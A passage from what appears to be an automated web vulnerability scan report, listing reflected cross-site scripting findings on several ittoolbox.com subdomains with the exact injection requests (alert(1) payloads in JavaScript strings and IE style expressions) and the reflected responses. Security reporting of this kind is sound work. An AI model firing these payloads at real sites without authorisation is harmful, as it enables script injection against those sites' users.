HTTP/1.1 200 OK Cache-Control: private Content-Length: 71129 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=iym3pizr0gbuoc45o0n1tdbj; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:49 GMT Connection: close
3.109. http://projectmanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://projectmanagement.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bde81'-alert(1)-'9af5a95404e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?bde81'-alert(1)-'9af5a95404e=1 HTTP/1.1 Host: projectmanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70526 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=srzbh0451zvt1aykxncvhz45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Project Man ...[SNIP]... && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fprojectmanagement.ittoolbox.com%2fDefault.aspx%3fbde81'-alert(1)-'9af5a95404e%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.110. http://projectmanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://projectmanagement.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10b8f"style%3d"x%3aexpression(alert(1))"94a69cf8ec8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10b8f"style="x:expression(alert(1))"94a69cf8ec8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?10b8f"style%3d"x%3aexpression(alert(1))"94a69cf8ec8=1 HTTP/1.1 Host: projectmanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70641 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=s1g3rr45jcox1t55dq4cltjq; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Project Man ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://projectmanagement.ittoolbox.com/Default.aspx?10b8f"style="x:expression(alert(1))"94a69cf8ec8=1" /> ...[SNIP]...
3.111. http://sap.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sap.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5c01"style%3d"x%3aexpression(alert(1))"faaf9b620ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5c01"style="x:expression(alert(1))"faaf9b620ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?a5c01"style%3d"x%3aexpression(alert(1))"faaf9b620ef=1 HTTP/1.1 Host: sap.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 83811 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=bdwb4luobk3iif45wvtitkjv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> SAP Communi ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://sap.ittoolbox.com/Default.aspx?a5c01"style="x:expression(alert(1))"faaf9b620ef=1" /> ...[SNIP]...
3.112. http://sap.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sap.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64f81'-alert(1)-'33dbbb56366 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?64f81'-alert(1)-'33dbbb56366=1 HTTP/1.1 Host: sap.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 83696 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=jcmkywvsla4hqv55tmvrz555; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> SAP Communi ...[SNIP]... ender != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fsap.ittoolbox.com%2fDefault.aspx%3f64f81'-alert(1)-'33dbbb56366%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.113. http://security.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://security.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67250'-alert(1)-'34814febd59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?67250'-alert(1)-'34814febd59=1 HTTP/1.1 Host: security.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 82066 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ae02ejrdk33rhrry3e05jd55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Security Co ...[SNIP]... != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fsecurity.ittoolbox.com%2fDefault.aspx%3f67250'-alert(1)-'34814febd59%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.114. http://security.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://security.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19004"style%3d"x%3aexpression(alert(1))"e443b525a7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19004"style="x:expression(alert(1))"e443b525a7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?19004"style%3d"x%3aexpression(alert(1))"e443b525a7a=1 HTTP/1.1
Host: security.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 82181
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dfp1w3y02wvntw3hcmaoh455; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:50 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Security Co ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://security.ittoolbox.com/Default.aspx?19004"style="x:expression(alert(1))"e443b525a7a=1" /> ...[SNIP]...
3.115. http://siebel.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://siebel.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aea1c'-alert(1)-'e4c1cea88a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aea1c'-alert(1)-'e4c1cea88a6=1 HTTP/1.1
Host: siebel.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72633
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4pxfuha5qkzrox55243pqb3a; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:01 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Siebel Comm ...[SNIP]... er != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fsiebel.ittoolbox.com%2fDefault.aspx%3faea1c'-alert(1)-'e4c1cea88a6%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.116. http://siebel.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://siebel.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5748c"style%3d"x%3aexpression(alert(1))"896ccf64b9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5748c"style="x:expression(alert(1))"896ccf64b9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?5748c"style%3d"x%3aexpression(alert(1))"896ccf64b9b=1 HTTP/1.1
Host: siebel.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72746
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nsjvz2bfl2vbqrjtqibnji45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:56 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Siebel Comm ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://siebel.ittoolbox.com/Default.aspx?5748c"style="x:expression(alert(1))"896ccf64b9b=1" /> ...[SNIP]...
3.117. http://storage.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://storage.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b153"style%3d"x%3aexpression(alert(1))"279e64ba5fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8b153"style="x:expression(alert(1))"279e64ba5fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?8b153"style%3d"x%3aexpression(alert(1))"279e64ba5fc=1 HTTP/1.1
Host: storage.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71962
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uphrzt45c0z2rp45gq2ga32n; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:55 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Storage Com ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://storage.ittoolbox.com/Default.aspx?8b153"style="x:expression(alert(1))"279e64ba5fc=1" /> ...[SNIP]...
3.118. http://storage.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://storage.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0463'-alert(1)-'a06fbc40b91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?c0463'-alert(1)-'a06fbc40b91=1 HTTP/1.1
Host: storage.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71850
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=id0ajg55ttoi4r2xhbzjzi55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:02 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Storage Com ...[SNIP]... r != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fstorage.ittoolbox.com%2fDefault.aspx%3fc0463'-alert(1)-'a06fbc40b91%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.119. http://supplychain.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://supplychain.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3242"style%3d"x%3aexpression(alert(1))"d4a4cddf558 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3242"style="x:expression(alert(1))"d4a4cddf558 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?b3242"style%3d"x%3aexpression(alert(1))"d4a4cddf558=1 HTTP/1.1
Host: supplychain.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 75056
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vmkl0r45zestph55yywxduu4; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:56 GMT
Connection: close
3.120. http://supplychain.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://supplychain.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d17c7'-alert(1)-'6dcaf5eea3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?d17c7'-alert(1)-'6dcaf5eea3a=1 HTTP/1.1
Host: supplychain.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74939
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uhazjb3ghrjdbp45y0c4ad2g; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:59 GMT
Connection: close
3.121. http://telephony.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://telephony.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 478ac"style%3d"x%3aexpression(alert(1))"e3abb888eab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 478ac"style="x:expression(alert(1))"e3abb888eab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?478ac"style%3d"x%3aexpression(alert(1))"e3abb888eab=1 HTTP/1.1
Host: telephony.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62722
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bzineuetfhf1b455njvyoj45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:59 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://telephony.ittoolbox.com/Default.aspx?478ac"style="x:expression(alert(1))"e3abb888eab=1" /> ...[SNIP]...
3.122. http://telephony.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://telephony.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ccc8'-alert(1)-'a149199ca41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?5ccc8'-alert(1)-'a149199ca41=1 HTTP/1.1
Host: telephony.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62605
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ibj0x5yryxkgiy45p1u4yv55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:01 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2ftelephony.ittoolbox.com%2fDefault.aspx%3f5ccc8'-alert(1)-'a149199ca41%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.123. http://unix.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://unix.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fb9e'-alert(1)-'b7dda7dde6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?6fb9e'-alert(1)-'b7dda7dde6f=1 HTTP/1.1
Host: unix.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 80634
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=es4ozeq2t0whigrwvrxax545; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:13 GMT
Connection: close
3.124. http://unix.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://unix.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e4e7"style%3d"x%3aexpression(alert(1))"28a7b7a768f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e4e7"style="x:expression(alert(1))"28a7b7a768f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?8e4e7"style%3d"x%3aexpression(alert(1))"28a7b7a768f=1 HTTP/1.1
Host: unix.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 80749
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dircxt45nurb15jv13tld2yb; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:10 GMT
Connection: close
3.125. http://visualbasic.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://visualbasic.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d160d"style%3d"x%3aexpression(alert(1))"7853bc49d25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d160d"style="x:expression(alert(1))"7853bc49d25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?d160d"style%3d"x%3aexpression(alert(1))"7853bc49d25=1 HTTP/1.1
Host: visualbasic.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64214
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=w3hcalnbh2ca1lq4t0b3k045; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:05 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Visual Basi ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://visualbasic.ittoolbox.com/Default.aspx?d160d"style="x:expression(alert(1))"7853bc49d25=1" /> ...[SNIP]...
3.126. http://visualbasic.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://visualbasic.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f46f'-alert(1)-'e6df936efc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?5f46f'-alert(1)-'e6df936efc7=1 HTTP/1.1
Host: visualbasic.ittoolbox.com
Accept: */*
Accept-Language: en
